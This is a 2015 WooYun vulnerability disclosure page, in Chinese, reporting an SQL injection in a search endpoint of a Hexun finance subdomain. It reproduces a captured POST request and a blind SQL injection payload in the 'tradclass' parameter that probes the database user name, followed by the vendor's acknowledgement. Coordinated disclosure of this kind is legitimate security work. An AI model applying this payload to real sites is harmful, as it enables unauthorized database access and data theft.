当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095562

漏洞标题:和讯财经分站SQL注入

相关厂商:和讯网

漏洞作者: greg.wu

提交时间:2015-02-04 19:13

修复时间:2015-03-21 19:14

公开时间:2015-03-21 19:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-04: 厂商已经确认,细节仅向厂商公开
2015-02-14: 细节向核心白帽子及相关领域专家公开
2015-02-24: 细节向普通白帽子公开
2015-03-06: 细节向实习白帽子公开
2015-03-21: 细节向公众公开

简要描述:

貌似新的分站,有注入哈

详细说明:

POST /Home/_IndexSearch HTTP/1.1
Host: zhibiao.hexun.com
Content-Length: 150
Accept: text/html, */*; q=0.01
Origin: http://zhibiao.hexun.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://zhibiao.hexun.com/Home/IndexSearch?searchtype=applyclass&searchvalue=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: vjuids=3e72ef26f.14b4f6cb5ca.0.2de22101; hxck_sq_common=LoginStateCookie=; ASP.NET_SessionId=lved0we234kjictpirtitiwo; __utmt=1; vjlast=1422966699.1422966699.30; HexunTrack=SID=20150116210512074b20462016982425b8af9a0eacc58067e&CITY=44&TOWN=440100; Hm_lvt_6324e7bdbecd35bc03f74df3b4540547=1422966734; Hm_lpvt_6324e7bdbecd35bc03f74df3b4540547=1422966910; __utma=194262068.39628422.1422966734.1422966734.1422966734.1; __utmb=194262068.7.10.1422966734; __utmc=194262068; __utmz=194262068.1422966734.1.1.utmcsr=hexun.com|utmccn=(referral)|utmcmd=referral|utmcct=/
investstyle=&tradclass=1&applyclass=1&indexclass=&fld_level=&indexname=&sort=1&dire=1


参数tradclass存在注入,构造盲注payload:
tradclass=1-case when 1=1 and len(system_user)=6 then 0 else 2/0 end
返回正确,可知数据库用户长度为6,不想深入了。。。就这样吧

漏洞证明:

以上

修复方案:

过滤

版权声明:转载请注明来源 greg.wu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-04 19:16

厂商回复:

谢谢处理中

最新状态:

暂无


漏洞评价:

评论